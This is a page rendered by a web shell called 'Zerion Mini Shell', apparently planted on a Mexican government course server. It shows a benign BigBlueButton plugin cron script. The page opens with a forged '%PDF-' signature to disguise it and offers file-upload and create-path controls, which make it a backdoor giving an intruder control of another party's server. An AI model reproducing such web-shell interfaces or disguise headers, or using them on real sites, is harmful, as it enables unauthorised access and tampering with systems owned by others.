%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/tjamichg/cursos.tjamich.gob.mx/plugin/bbb/
Upload File :
Create Path :
Current File : /home/tjamichg/cursos.tjamich.gob.mx/plugin/bbb/cron.php

<?php
/* For license terms, see /license.txt */

require_once __DIR__.'/../../vendor/autoload.php';
if (file_exists(__DIR__.'/config.vm.php')) {
    require_once __DIR__.'/config.php';

    require __DIR__.'/lib/vm/AbstractVM.php';
    require __DIR__.'/lib/vm/VMInterface.php';
    require __DIR__.'/lib/vm/DigitalOceanVM.php';
    require __DIR__.'/lib/VM.php';

    $config = require __DIR__.'/config.vm.php';

    $vm = new VM($config);

    if ($vm->isEnabled()) {
        $bbb = new bbb();
        if ($bbb->pluginEnabled) {
            $activeSessions = $bbb->getActiveSessionsCount();
            if (empty($activeSessions)) {
                $vm->runCron();
            } else {
                echo "Can't run cron active sessions found: ".$activeSessions;
            }
        }
    }
}

Zerion Mini Shell 1.0